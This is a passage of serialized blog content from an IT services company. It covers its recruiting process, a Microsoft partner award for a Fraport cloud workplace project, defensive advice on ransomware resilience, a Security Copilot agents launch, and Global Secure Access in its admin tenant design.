be.",[897,6803,6805],{"id":6804},"step-2-getting-to-know-people-culture","Step 2: Getting to Know People & Culture",[809,6807,825],{},[809,6809,6810],{},"If your profile fits, we move to the first round. Don't worry – you don't need to be nervous! You've already made a great first impression with your CV. In the conversation, we want to get to know you as a person:",[1648,6812,6813,6816,6819],{},[1652,6814,6815],{},"Who are you?",[1652,6817,6818],{},"What makes you tick?",[1652,6820,6821],{},"What are you looking for in your future?",[809,6823,6824],{},"This is about an open, honest meeting at eye level.",[897,6826,6828],{"id":6827},"step-3-technical-exchange-with-your-future-lead","Step 3: Technical Exchange with Your Future Lead",[809,6830,825],{},[809,6832,6833],{},"In the second conversation, you'll meet your lead. Now it gets a bit more technical: We discuss your professional skills and you can ask all questions about tasks, team and projects. A bit of excitement is natural – but hey, you're already one step further!",[897,6835,6837],{"id":6836},"step-4-team-meet-culture-check","Step 4: Team Meet & Culture Check",[809,6839,825],{},[809,6841,6842],{},"At glueckkanja, culture is more than a word – it's our daily life. That's why in the last step you'll meet your potential team. We want to ensure it's a good fit for both sides – professionally and personally.",[897,6844,6846],{"id":6845},"finale-your-offer","Finale: Your Offer",[809,6848,825],{},[809,6850,6851],{},"Have you convinced us? Then comes the personal offer conversation. Here we clarify all details about the offer and answer all your final questions.",[897,6853,6855],{"id":6854},"why-so-many-steps","Why So Many Steps?",[809,6857,825],{},[809,6859,6860],{},"Simple: We want to ensure that you feel comfortable with us and that we're successful together. All conversations take place at eye level – and using first names is natural for us.",{"title":927,"searchDepth":928,"depth":928,"links":6862},[6863,6864,6865,6866,6867,6868],{"id":6792,"depth":935,"text":6793},{"id":6804,"depth":935,"text":6805},{"id":6827,"depth":935,"text":6828},{"id":6836,"depth":935,"text":6837},{"id":6845,"depth":935,"text":6846},{"id":6854,"depth":935,"text":6855},{"lang":940,"seoTitle":6766,"titleClass":942,"date":6870,"categories":6871,"blogtitlepic":6872,"socialimg":6873,"customExcerpt":6874,"keywords":6875,"hreflang":6876,"scripts":6881},"2025-12-08",[945],"head-recruiting-process","/blog/heads/head-recruiting-process.png","You've discovered an exciting position with us and want to apply? Great – we're always happy to welcome new talent! But what happens after you click 'Submit Application'? Here we give you a behind-the-scenes look.","Recruiting, Application Process, IT Company Jobs",[6877,6879],{"lang":4,"href":6878},"/de/posts/2025-12-08-recruiting-process.md",{"lang":1028,"href":6880},"/es/posts/2025-12-08-recruiting-process.md",{"slick":511,"form":511},"/posts/2025-12-08-recruiting-process",{"title":6766,"description":6772},"posts/2025-12-08-recruiting-process",[2443,6886,2225],"Recruiting","A81I65aif5WUKskn7lxOD-mfqKr-D_H7DzNWlnNNEe8",{"id":6889,"title":6890,"author":6891,"body":6892,"cta":767,"description":927,"eventid":767,"extension":937,"hideInRecent":752,"layout":938,"meta":6970,"moment":6971,"navigation":511,"path":7018,"seo":7019,"stem":7020,"tags":7021,"webcast":752,"__hash__":7023},"content_en/posts/2025-11-12-partner-of-the-year-awards.md","Cloud-first at the airport: Microsoft Partner of the Year Awards 2025",[804],{"type":806,"value":6893,"toc":6964},[6894,6898,6900,6903,6906,6910,6912,6915,6918,6932,6935,6938,6942,6944,6947,6951,6953,6956],[819,6895,6897],{"id":6896},"from-the-runway-to-the-cloud","From the runway to the cloud",[809,6899,825],{},[809,6901,6902],{},"Fraport operates 29 airports worldwide, including Frankfurt Airport, one of Europe's largest transportation hubs. More than 80,000 employees keep operations running every day, from baggage handling to IT security. To make all this work, you need a reliable, scalable, and secure digital infrastructure.",[809,6904,6905],{},"That's where the joint project between Fraport and glueckkanja came in: the existing VDI environment was to be replaced with a modern, cloud-based workplace architecture. The goal: more flexibility, less complexity, and a platform built for a globally connected organization.",[819,6907,6909],{"id":6908},"cloud-managed-workplace","Cloud Managed Workplace",[809,6911,825],{},[809,6913,6914],{},"At the core lies the combination of Windows 365 Cloud PCs and the Microsoft Intune Suite. Today, more than 16,500 endpoints are centrally deployed, managed, and secured.",[809,6916,6917],{},"The results:",[1648,6919,6920,6923,6926,6929],{},[1652,6921,6922],{},"Device provisioning in minutes instead of hours",[1652,6924,6925],{},"Automated processes for higher efficiency",[1652,6927,6928],{},"Transparent management and monitoring",[1652,6930,6931],{},"A Zero Trust security model across all devices",[809,6933,6934],{},"The outcome: a workplace concept that enables Fraport employees to work securely and flexibly across all locations, devices, and roles.",[2388,6936],{":quotes":6937,":no-fullscreen":2391,"spacing":2392},"quoteMicrosoft",[819,6939,6941],{"id":6940},"recognition-for-innovation-and-collaboration","Recognition for innovation and collaboration",[809,6943,825],{},[809,6945,6946],{},"Each year, Microsoft honors partners who deliver outstanding cloud solutions, services, and innovations. In a global competition with more than 4,600 submissions, glueckkanja was recognized for the successful implementation of the Fraport project, a strong signal for the growing importance of cloud-based workplace solutions in critical infrastructures.",[819,6948,6950],{"id":6949},"a-blueprint-for-modern-workplace-architecture","A blueprint for modern workplace architecture",[809,6952,825],{},[809,6954,6955],{},"This project demonstrates how complex infrastructures can be reimagined through the cloud — without compromising on security or user experience. For Fraport, it marked the move to a standardized, cloud-based workplace model. For glueckkanja, it’s a proof point of how modern IT strategies can scale sustainably.",[809,6957,6958,6959,3436],{},"The full list of award-winning projects can be found ",[813,6960,6963],{"href":6961,"rel":6962},"https://aka.ms/2025POTYAWinnersFinalists",[1509],"here",{"title":927,"searchDepth":928,"depth":928,"links":6965},[6966,6967,6968,6969],{"id":6896,"depth":928,"text":6897},{"id":6908,"depth":928,"text":6909},{"id":6940,"depth":928,"text":6941},{"id":6949,"depth":928,"text":6950},{"lang":940,"seoTitle":6890,"titleClass":942,"date":6971,"categories":6972,"blogtitlepic":6973,"socialimg":6974,"customExcerpt":6975,"keywords":6976,"contactInContent":6977,"hreflang":7006,"scripts":7011,"quoteMicrosoft":7012},"2025-11-12",[945],"head-partner-of-the-year-2025","/blog/heads/head-partner-of-the-year-2025.jpg","Out of more than 4,600 nominations from over 100 countries, one project stood out as a showcase of what modern IT can look like: together with Fraport, glueckkanja was recognized at the Microsoft Partner of the Year Awards 2025 in the Cloud Endpoints category.","Microsoft Partner of the Year Awards 2025, Cloud Endpoints Award, glueckkanja Fraport, Fraport Microsoft Case Study, Windows 365 Cloud PC, Microsoft Intune Suite, Cloud Managed Workplace, Azure Cloud Migration, Zero Trust Security, Modern Workplace, Cloud-first strategy, Digital workplace transformation, Endpoint management, Device provisioning automation, Secure cloud infrastructure, Scalable IT architecture, Cloud governance and compliance, Enterprise mobility and security, Airport IT infrastructure, Aviation digital transformation, Critical infrastructure IT, Global operations, Remote workforce enablement, IT modernization in transportation, Cloud-based workplace for critical infrastructure, Microsoft Windows 365 and Intune in enterprise environments, Secure and scalable endpoint management, Transforming airport IT operations with Azure",{"quote":511,"infos":6978},{"bgColor":952,"color":953,"boxBgColor":764,"boxColor":953,"headline":6979,"subline":6980,"level":819,"textStyling":956,"flush":957,"person":6981,"form":6990},"Get in Touch","Want to learn more about the project and our award? We'd be happy to show you how Fraport’s journey toward a standardized cloud architecture was brought to life.",{"image":6982,"cloudinary":511,"alt":1183,"name":1183,"quotee":1183,"quoteeTitle":6983,"quote":6984,"detailsHeader":6985,"details":6986},"/people/people-christian-kanja.jpg","CEO","The project with Fraport shows how standardization and automation can enable a secure, scalable workplace model, exactly what's needed to run and evolve IT environments reliably over the long term.","We’re looking forward\u003Cbr />to hearing from you!",[6987,6989],{"text":765,"href":1899,"details":6988,"icon":970},"Jetzt anrufen",{"text":766,"href":2315,"icon":974},{"ctaText":976,"cta":6991,"method":938,"action":979,"fields":6992},{"skin":978},[6993,6994,6995,6996,6997,6998,6999,7000,7001,7003,7004,7005],{"type":982,"id":983,"value":984},{"label":986,"type":987,"id":988,"required":511,"requiredMsg":989},{"label":991,"type":987,"id":615,"required":511,"requiredMsg":992},{"label":994,"type":995,"id":995,"required":511,"requiredMsg":996},{"label":998,"type":999,"id":1000,"required":752,"requiredMsg":1001},{"label":5174,"type":1004,"id":1005,"required":511,"requiredMsg":1006},{"type":982,"id":1008,"value":945},{"type":982,"id":1010,"value":2327},{"type":982,"id":1013,"value":7002},"Form: Blog Microsoft Partner of the Year | EN",{"type":982,"id":1016,"value":1017},{"type":982,"id":1019},{"type":982,"id":1021},[7007,7009],{"lang":4,"href":7008},"/de/posts/2025-11-12-partner-of-the-year-awards",{"lang":1028,"href":7010},"/es/posts/2025-11-12-partner-of-the-year-awards",{"slick":511,"form":511},{"items":7013},[7014],{"text":7015,"name":7016,"company":7017,"alt":7016},"By moving to Windows 365 Cloud PCs and the Intune Suite, we've achieved a new level of agility and security. The collaboration with glueckkanja has laid the foundation for future innovation.","Niklas Rast","Senior Solution Architect at Fraport","/posts/2025-11-12-partner-of-the-year-awards",{"title":6890,"description":927},"posts/2025-11-12-partner-of-the-year-awards",[1035,7022],"Partner of the Year","vBjeQWzJPOohto13ffDrF8OrfwIbDD8PDxh0TScUazY",{"id":7025,"title":7026,"author":7027,"body":7028,"cta":767,"description":927,"eventid":767,"extension":937,"hideInRecent":752,"layout":938,"meta":7156,"moment":7157,"navigation":511,"path":7191,"seo":7192,"stem":7193,"tags":7194,"webcast":752,"__hash__":7196},"content_en/posts/2025-10-07-prevent-cyber-attacks.md","Preventing Cyber Attacks: How Companies Build Resilience with IT Structures",[804],{"type":806,"value":7029,"toc":7147},[7030,7032,7036,7038,7041,7044,7048,7050,7054,7056,7063,7066,7070,7072,7080,7083,7090,7094,7096,7103,7110,7114,7116,7124,7127,7131,7133,7136,7139],[2462,7031],{},[819,7033,7035],{"id":7034},"why-cyber-attacks-succeed-so-frequently","Why cyber attacks succeed so frequently",[809,7037,825],{},[809,7039,7040],{},"Ransomware attacks are no coincidence. Attackers deliberately choose times when companies are understaffed — such as weekends. They exploit vulnerabilities like outdated authentication processes, unpatched systems, or misconfigured access points. A common mistake: the lack of a unified security concept. Instead of a well-thought-out overall strategy, many companies rely on isolated measures that are insufficient against complex attacks.",[809,7042,7043],{},"However, there are well proven approaches: a security model based on zero-trust principles, as well as clear structuring of access rights and automation to enable rapid response in case of emergency.",[819,7045,7047],{"id":7046},"three-pillars-for-a-robust-it-security-strategy","Three pillars for a robust IT security strategy",[809,7049,825],{},[819,7051,7053],{"id":7052},"secure-infrastructure-the-foundation-for-resilience","Secure Infrastructure – The foundation for resilience",[809,7055,2484],{},[809,7057,7058,7059,7062],{},"A resilient IT infrastructure must not only function reliably but also actively close security gaps. In our example, 300 computers had to be isolated. The first step was therefore the complete reinstallation of a clean environment—based on our ",[813,7060,319],{"href":7061},"https://www.glueckkanja.com/en/azure/azure-foundation?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article",". This cloud infrastructure follows clear security guidelines and is rolled out in a standardized way using Infrastructure-as-Code (IaC). This allows security configurations to be automatically checked and updated according to best practices.",[809,7064,7065],{},"Another advantage: The use of zero-trust principles ensures that workloads are segmented and only released for authorized connections. This keeps the attack surface minimal.",[819,7067,7069],{"id":7068},"security-starts-with-authentication","Security starts with authentication",[809,7071,2484],{},[809,7073,7074,7075,7079],{},"In almost every cyberattack, identity management is the first point of attack. Passwords only are no longer enough. With ",[813,7076,7078],{"href":7077},"https://www.glueckkanja.com/en/modern-workplace/azure-active-directory?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article","Entra ID",", user accounts can be centrally managed and secured. Multi-factor authentication (MFA) is the standard.",[809,7081,7082],{},"Another advantage: Suspicious activities are automatically detected and reviewed. For example, if a user logs in again from another location within a few minutes, this is recognized as a potential threat and access is automatically blocked.",[809,7084,7085,7086,7089],{},"To detect attackers in the infrastructure, advanced systems such as Extended Detection and Response (XDR) and Security Information and Event Management (SIEM) are used. These solutions aggregate alarms and events, analyze them, and enable rapid assessment. A managed SOC—such as the ",[813,7087,425],{"href":7088},"https://www.glueckkanja.com/en/security/cloud-security-operations-center?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article"," from glueckkanja—helps to make optimal use of these technologies.",[819,7091,7093],{"id":7092},"restoring-workstations-quickly","Restoring workstations quickly",[809,7095,2484],{},[809,7097,7098,7099,7102],{},"After an attack, employees need to be able to work again quickly. Cloud-based solutions like ",[813,7100,103],{"href":7101},"https://www.glueckkanja.com/en/modern-workplace/microsoft-intune?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article"," are essential for this. Devices can be fully reset and configured via a central portal—regardless of where the user is located.",[809,7104,7105,7106,7109],{},"The advantage: Employees can carry out the process themselves without the IT department having to manually set up each device. In addition, platforms like ",[813,7107,519],{"href":7108},"https://www.realmjoin.com/?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article"," automatically distribute all relevant software packages and ensure that security updates are installed.",[819,7111,7113],{"id":7112},"emergency-protection-azere-as-a-contingency-solution","Emergency protection: AzERE as a contingency solution",[809,7115,825],{},[809,7117,7118,7119,7123],{},"An incident like this shows how important it is to have an emergency strategy in place. ",[813,7120,7122],{"href":7121},"https://www.glueckkanja.com/en/azure/azure-emergency-response-environment?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article","AzERE"," (Azure Emergency Response Environment) provides an isolated environment in which critical systems such as the domain controller are replicated in a secure “Dark Tenant” instance. This enables access to a clean version of the data, even in the event of a large-scale attack.",[809,7125,7126],{},"Additionally, AzERE enables the setup of a digital “War Room”: a platform where all relevant stakeholders come together to coordinate actions in real time. This central communication capability can make the decisive difference when minutes determine success or failure.",[819,7128,7130],{"id":7129},"conclusion-proactive-resilience-instead-of-reacting-to-threats","Conclusion: Proactive resilience instead of reacting to threats",[809,7132,825],{},[809,7134,7135],{},"This incident shows: An effective security concept requires more than isolated solutions. It needs a combination of secure cloud infrastructure, robust identity management, and a modern work environment that can be quickly restored.",[809,7137,7138],{},"And that’s exactly why our IT Workaholics stories are about people whose IT operations we’ve brought back from crisis mode to normal operations.",[809,7140,7141,7142,7146],{},"Read ",[813,7143,7145],{"href":7144},"https://www.glueckkanja.com/en/it-workaholics?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article","IT Workaholics stories"," now!",{"title":927,"searchDepth":928,"depth":928,"links":7148},[7149,7150,7151,7152,7153,7154,7155],{"id":7034,"depth":928,"text":7035},{"id":7046,"depth":928,"text":7047},{"id":7052,"depth":928,"text":7053},{"id":7068,"depth":928,"text":7069},{"id":7092,"depth":928,"text":7093},{"id":7112,"depth":928,"text":7113},{"id":7129,"depth":928,"text":7130},{"lang":940,"seoTitle":7026,"titleClass":942,"date":7157,"categories":7158,"blogtitlepic":7159,"socialimg":7160,"customExcerpt":7161,"keywords":7162,"contactInContent":7163,"hreflang":7184,"footer":7189,"scripts":7190,"published":511},"2025-10-07",[373],"head-preventing-cyber-attacks","/blog/heads/head-preventing-cyber-attacks.png","Saturday morning, somewhere in Germany. While the weekend is just beginning for many, our team notices the first warning signs on a client company’s systems: unusual activities that immediately trigger all alarm bells. A quick analysis confirms the suspicion—ransomware. Within a very short time, critical systems are compromised. What follows is a race against time: securing systems, isolating critical areas, and then starting the recovery process.","Security, CSOC, Microsoft Security, Cyber Attacks, Prevention",{"quote":511,"infos":7164},{"bgColor":952,"headline":2303,"subline":7165,"level":819,"textStyling":956,"flush":957,"person":7166,"form":7168},"Want to know how our 10 Microsoft-native Security Copilot Agents help simplify operations across Security, Entra, Intune, and Purview? Fill out the form, and we’ll share real-world insights, demos, and examples tailored to your needs.",{"image":1895,"cloudinary":511,"alt":960,"name":961,"quotee":961,"quoteeTitle":962,"quote":7167},"What our customers gain is time and clarity: Security teams spend less effort on manual analysis and troubleshooting, and more time focusing on the threats that really matter. With our 10 Security Copilot Agents, we help them improve their security posture, reduce costs, and simplify daily operations directly within Microsoft Security.",{"ctaText":976,"cta":7169,"method":938,"action":979,"fields":7170},{"skin":978},[7171,7172,7173,7174,7175,7176,7177,7178,7179,7181,7182,7183],{"type":982,"id":983,"value":984},{"label":986,"type":987,"id":988,"required":511,"requiredMsg":989},{"label":991,"type":987,"id":615,"required":511,"requiredMsg":992},{"label":994,"type":995,"id":995,"required":511,"requiredMsg":996},{"label":998,"type":999,"id":1000,"required":752,"requiredMsg":1001},{"label":5174,"type":1004,"id":1005,"required":511,"requiredMsg":1006},{"type":982,"id":1008,"value":373},{"type":982,"id":1010,"value":2327},{"type":982,"id":1013,"value":7180},"Form: Blog Microsoft Security Store | EN",{"type":982,"id":1016,"value":1017},{"type":982,"id":1019},{"type":982,"id":1021},[7185,7187],{"lang":4,"href":7186},"/de/posts/2025-10-07-prevent-cyber-attacks.md",{"lang":1028,"href":7188},"/es/posts/2025-10-07-prevent-cyber-attacks.md",{"noMargin":511},{"slick":511},"/posts/2025-10-07-prevent-cyber-attacks",{"title":7026,"description":927},"posts/2025-10-07-prevent-cyber-attacks",[373,7195],"CSOC","zE1YAl_TshBCcRDvmbjb7GwTlQqhDAkJfj_SzsVBbDw",{"id":7198,"title":7199,"author":7200,"body":7201,"cta":767,"description":927,"eventid":767,"extension":937,"hideInRecent":752,"layout":938,"meta":7302,"moment":7304,"navigation":511,"path":7342,"seo":7343,"stem":7344,"tags":7345,"webcast":752,"__hash__":7348},"content_en/posts/2025-09-30-security-store.md","First Worldwide: glueckkanja Security Copilot Agents",[804],{"type":806,"value":7202,"toc":7297},[7203,7207,7209,7212,7214,7217,7220,7223,7226,7230,7237,7241,7251,7262,7279,7290],[819,7204,7206],{"id":7205},"at-the-launch-of-the-microsoft-security-store-glueckkanja-introduced-10-security-copilot-agents","At the launch of the Microsoft Security Store, glueckkanja introduced 10 Security Copilot Agents",[809,7208,825],{},[809,7210,7211],{},"Offenbach, Germany – September 30, 2025 – glueckkanja today announced its inclusion in the Microsoft Security Store Partner Ecosystem. As one of the very first partners, glueckkanja was selected based on their proven experience with Microsoft Security technologies, willingness to explore and provide feedback on cutting edge functionality, and close relationship with Microsoft.",[2388,7213],{":quotes":2388,":no-fullscreen":2391},[2489,7215],{"style":7216},"padding-top:50px;",[809,7218,7219],{},"glueckkanja is collaborating with Microsoft to help shape the development of the Microsoft Security Store, providing feedback on new features, integration experiences, and customer needs. By publishing certified solutions and AI agents that integrate seamlessly with Microsoft Security products, glueckkanja is making it easier for organizations to discover, purchase, and deploy trusted security technologies. Through the Security Store, glueckkanja is helping customers accelerate their security outcomes and simplify operations with solutions that are vetted, easy to deploy, and designed to work together.",[809,7221,7222],{},"The Microsoft Security Store simplifies how organizations discover, purchase, and deploy trusted solutions and AI agents. With certified integrations, simplified billing, and accelerated deployment, the Security Store helps defenders improve their security posture while focusing on what matters most.",[809,7224,7225],{},"The Microsoft Security Store is setting a new benchmark for cybersecurity procurement and deployment. By centralizing a wide range of security solutions and AI agents organizations can now streamline how they discover, acquire, and operationalize advanced security technologies. With features like industry framework alignment, simplified billing, and guided deployment, the Security Store helps security teams reduce complexity, accelerate adoption, and maximize the value of their security investment.",[819,7227,7229],{"id":7228},"learn-more-in-the-official-microsoft-blog","Learn more in the official Microsoft blog:",[809,7231,7232],{},[813,7233,7236],{"href":7234,"rel":7235},"https://techcommunity.microsoft.com/blog/securitycopilotblog/agentic-security-your-way-build-your-own-security-copilot-agents/4454555",[1509],"Agentic Security Your Way: Build Your Own Security Copilot Agents",[819,7238,7240],{"id":7239},"about-glueckkanja","About glueckkanja",[809,7242,7243,7246,7247,7250],{},[1655,7244,7245],{},"We Manage and Protect Microsoft Ecosystems at Scale","\nglueckkanja is a leading cloud managed service provider and top Microsoft partner, delivering secure, scalable, and fully ",[1655,7248,7249],{},"cloud-native Microsoft environments."," With a unified blueprint approach and Infrastructure-as-Code methodology, glueckkanja enables enterprise customers to accelerate their digital transformation and cloud adoption. Securely, consistently, and at scale.",[809,7252,7253,7254,7257,7258,7261],{},"The company offers comprehensive managed services for ",[1655,7255,7256],{},"Microsoft Azure, Microsoft Entra, and Microsoft Intune,"," helping organizations streamline identity and access management, modernize endpoint operations, and build compliant, Zero Trust-based infrastructures. These services are complemented by ",[1655,7259,7260],{},"24/7 security operations"," and incident response capabilities via glueckkanja’s dedicated Cybersecurity Operations Center (SOC), ensuring continuous protection, threat mitigation, and alignment with the latest security standards.",[809,7263,7264,7265,7267,7268,2261,7270,7272,7273,7275,7276,7278],{},"To support a seamless and cloud-native Microsoft experience, glueckkanja has developed a suite of proprietary tools that simplify management and drive automation: ",[1655,7266,543],{}," for secure collaboration with Microsoft 365 data, ",[1655,7269,582],{},[1655,7271,531],{}," for passwordless, Intune-integrated network authentication, ",[1655,7274,519],{}," for scalable software distribution, and ",[1655,7277,570],{}," for fully automated provisioning of CloudPCs and hardware clients via Intune.",[809,7280,7281,7282,7285,7286,7289],{},"glueckkanja was among the first global partners to receive the ",[1655,7283,7284],{},"Microsoft Verified MXDR"," certification, validating its excellence in managed security operations. With nearly 250 cloud professionals and a proven track record of success, glueckkanja has been recognized multiple times as a Microsoft Worldwide Partner of the Year finalist/winner, and ranks consistently at the top of the ",[1655,7287,7288],{},"ISG Microsoft 365"," Germany quadrant since 2019.",[809,7291,7292,7293,7296],{},"The company is also a recognized innovatoramong Germany’s TOP 100 most innovative companies, and its ",[1655,7294,7295],{},"outstanding 4.7/5 Kununu rating"," (Germany’s leading employer review platform) underlines its culture of excellence and employee satisfaction.",{"title":927,"searchDepth":928,"depth":928,"links":7298},[7299,7300,7301],{"id":7205,"depth":928,"text":7206},{"id":7228,"depth":928,"text":7229},{"id":7239,"depth":928,"text":7240},{"lang":940,"seoTitle":7303,"titleClass":942,"date":7304,"categories":7305,"blogtitlepic":7306,"socialimg":7307,"customExcerpt":7308,"keywords":7309,"maxContent":752,"hreflang":7310,"quotes":7315,"contactInContent":7322,"footer":7340,"scripts":7341,"published":511},"glueckkanja named Launch Partner for Microsoft Security Store, delivering 10 Copilot Agents","2025-09-30",[373],"head-security-agents.jpg","/blog/heads/head-security-agents.jpg","glueckkanja is among the first partners in the Microsoft Security Store Preview, delivering 10 Microsoft-native Security Copilot Agents across Security, Entra, Intune, and Purview. Developed in close collaboration with customers, these agents are designed to address real-world security challenges from day one – fully integrated, enterprise-ready, and built to simplify and accelerate security operations.","Microsoft Security Store Preview, Security Copilot Agents, glueckkanja Microsoft partner, Microsoft-native security solutions, AI-powered cybersecurity tools, Entra security agents, Intune security automation, Purview compliance agents, Cloud security Microsoft Copilot, Simplify Microsoft Security operations",[7311,7313],{"lang":4,"href":7312},"/de/posts/2025-09-30-security-store",{"lang":1028,"href":7314},"/es/posts/2025-09-30-security-store",{"items":7316},[7317],{"text":7318,"name":7319,"position":7320,"company":7321},"A Forensic Agent by glueckkanja AG delivers deep-dive analysis of Defender XDR incidents to accelerate investigations, while their Privileged Admin Watchdog Agent helps enforce zero standing privilege principles by getting rid of persistent admin identities. These innovations, along with their other 6 agents in the Security Store today, demonstrate how glueckkanja AG is empowering organizations to tackle a wide range of security and IT challenges.","Dorothy Li","Corporate Vice President, Security Copilot, Ecosystem and Marketplace","Microsoft",{"quote":511,"infos":7323},{"bgColor":952,"headline":2303,"subline":7165,"level":819,"textStyling":956,"flush":957,"person":7324,"form":7325},{"image":1895,"cloudinary":511,"alt":960,"name":961,"quotee":961,"quoteeTitle":962,"quote":7167},{"ctaText":976,"cta":7326,"method":938,"action":979,"fields":7327},{"skin":978},[7328,7329,7330,7331,7332,7333,7334,7335,7336,7337,7338,7339],{"type":982,"id":983,"value":984},{"label":986,"type":987,"id":988,"required":511,"requiredMsg":989},{"label":991,"type":987,"id":615,"required":511,"requiredMsg":992},{"label":994,"type":995,"id":995,"required":511,"requiredMsg":996},{"label":998,"type":999,"id":1000,"required":752,"requiredMsg":1001},{"label":5174,"type":1004,"id":1005,"required":511,"requiredMsg":1006},{"type":982,"id":1008,"value":373},{"type":982,"id":1010,"value":2327},{"type":982,"id":1013,"value":7180},{"type":982,"id":1016,"value":1017},{"type":982,"id":1019},{"type":982,"id":1021},{"noMargin":511},{"slick":511},"/posts/2025-09-30-security-store",{"title":7199,"description":927},"posts/2025-09-30-security-store",[5249,7346,7347],"Security Copilot","Microsoft Security","bI681GQW56vqiyGjvt5Z2TnnGwyXSPDOKNJMO5QJZsw",{"id":7350,"title":7351,"author":7352,"body":7353,"cta":767,"description":927,"eventid":767,"extension":937,"hideInRecent":752,"layout":938,"meta":7568,"moment":7570,"navigation":511,"path":7603,"seo":7604,"stem":7605,"tags":7606,"webcast":752,"__hash__":7610},"content_en/posts/2025-09-25-gsa-unlocked.md","Global Secure Access Unlocked",[1136,1291],{"type":806,"value":7354,"toc":7554},[7355,7359,7361,7364,7367,7370,7374,7376,7379,7384,7387,7392,7395,7401,7405,7407,7410,7414,7416,7419,7422,7425,7428,7433,7437,7439,7442,7450,7455,7459,7461,7464,7467,7470,7475,7479,7481,7484,7487,7490,7495,7499,7501,7504,7507,7510,7518,7521,7526,7530,7532,7535,7538,7542,7546,7548,7551],[819,7356,7358],{"id":7357},"what-is-a-managed-red-tenant","What is a Managed Red Tenant?",[809,7360,825],{},[809,7362,7363],{},"The Managed Red Tenant combines our extensive experience in managed services with proven blueprints in the areas of workplace, Azure, and security.",[809,7365,7366],{},"The result: An isolated, fully cloud-based as-code managed environment that effectively protects administrative users and endpoints – even in target environments with multiple Microsoft Entra tenants and Active Directory domains.",[809,7368,7369],{},"Our solution relies on native, cloud-based identity and security features from Microsoft and strictly adheres to Zero Trust principles.",[897,7371,7373],{"id":7372},"global-secure-access-as-security-service-edge","Global Secure Access as Security Service Edge",[809,7375,2484],{},[809,7377,7378],{},"We have integrated the latest innovations from Global Secure Access into various components of the Managed Red Tenant to enhance security when accessing Virtual Access Workstations (VAWs) and to protect and restrict outgoing privileged access.",[809,7380,7381],{},[1655,7382,7383],{},"Microsoft Entra Internet Access",[809,7385,7386],{},"functioning as an identity-centric Secure Web Gateway (SWG), has been implemented to block public internet access and restrict connectivity to privileged interfaces and the authorized company’s tenant environments only. Additional features, such as Universal Conditional Access Evaluation (CAE), enable near real-time access blocking.",[809,7388,7389],{},[1655,7390,7391],{},"Microsoft Entra Private Access",[809,7393,7394],{},"serves as an identity-centric Zero Trust Network Access (ZTNA) solution and is the core of our approach to providing secure and private access to VAWs. Its integration into our solution adds an extra layer of protection for privileged sessions on AVD-based endpoints by enforcing Conditional Access on the accessing client before establishing connectivity to the VAW. Securing access and applying Zero Trust principle to manage private or on-premises resources is another use cases where we take benefit of Private Access.",[809,7396,7397],{},[838,7398],{"alt":7399,"src":7400},"image.png","https://res.cloudinary.com/c4a8/image/upload/blog/pics/gsa-img-01.png",[819,7402,7404],{"id":7403},"use-cases-for-global-secure-access-in-the-managed-red-tenant","Use Cases for Global Secure Access in the Managed Red Tenant",[809,7406,825],{},[809,7408,7409],{},"Global Secure Access is one of the core components in the design of our Managed Red Tenant, and we’re excited to elevate both security and usability to a new level. The added value becomes most evident when looking at the individual use cases, which we’ll showcase in this blog.",[897,7411,7413],{"id":7412},"access-to-virtual-access-workstations","Access to Virtual Access Workstations",[809,7415,2484],{},[809,7417,7418],{},"Some organizations choose not to equip all administrators with physical Privileged Admin Workstations (PAWs). For these low-privileged admins, we offer what we call Virtual Access Workstations (VAWs).",[809,7420,7421],{},"The most critical aspect here is secure access to the VAWs, and we consider it essential to establish a high level of security—where Entra Private Access plays a key role.",[809,7423,7424],{},"Administrators connect to the VAWs from their enterprise devices and sign in using their account from the Managed Red Tenant. Because of this identity switch, the accessing user is sourced from a different tenant than the the original device and will not able to present a device compliance status.",[809,7426,7427],{},"Therefore, we are using global secure access for pre-authentication using the original user from the device. Since our VAWs do not expose public endpoints and are only accessible via Entra Private Access, we can secure network access to a very high degree. Conditional Access in the workforce environment enforces strong user and device authentication, including device compliance and risk-based controls.",[809,7429,7430],{},[838,7431],{"alt":7399,"src":7432},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/gsa-img-02.png",[897,7434,7436],{"id":7435},"secure-web-filtering","Secure Web Filtering",[809,7438,2484],{},[809,7440,7441],{},"A key characteristic of administrative devices is their strictly limited access to applications, designed to minimize the attack surface as much as possible. While local solutions such as proxy.pac files or shared centralized proxies (not T0 exclusive) were commonly used in the past, we’ve opted for Entra Internet Access for devices within the Managed Red Tenant.",[1648,7443,7444,7447],{},[1652,7445,7446],{},"Internet access is only permitted from compliant devices and after strong user authentication",[1652,7448,7449],{},"Access is restricted to explicitly approved URLs, and since HTTPS traffic (where possible) is decrypted and inspected, it’s also feasible to limit access to specific paths—for example, within Azure DevOps or GitHub",[809,7451,7452],{},[838,7453],{"alt":7399,"src":7454},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/gsa-img-03.png",[897,7456,7458],{"id":7457},"tenant-restrictions-for-saas-services-and-administrative-interfaces","Tenant Restrictions for SaaS Services and Administrative Interfaces",[809,7460,2484],{},[809,7462,7463],{},"In SaaS services and administrative interfaces, it’s common for URLs to be identical across all tenants, which makes them difficult to control using the web filtering methods described above.",[809,7465,7466],{},"To ensure that only accounts from the Managed Red Tenant can sign in to Microsoft’s approved portals from an administrative device, we leverage the Tenant Restriction feature of Global Secure Access.",[809,7468,7469],{},"Through Entra Internet Access, Entra ID is signaled which tenants are permitted for sign-in. This guarantees that all policies from the Managed Red Tenant are enforced and that administrative access occurs exclusively via B2B collaboration.",[809,7471,7472],{},[838,7473],{"alt":7399,"src":7474},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/gsa-img-04.png",[897,7476,7478],{"id":7477},"on-premises-access","On-Premises Access",[809,7480,2484],{},[809,7482,7483],{},"Of course, a Managed Red Tenant can also be used to administer on-premises and IaaS environments, which requires secure access to the datacenters. Entra Private Access provides us with Zero Trust Network Access that combines top-tier security standards with a flexible architecture and strong performance.",[809,7485,7486],{},"Access to datacenters and IaaS environments depends on robust user and device authentication, including device compliance and risk-based controls.",[809,7488,7489],{},"Managing individual targets as app segments enables granular 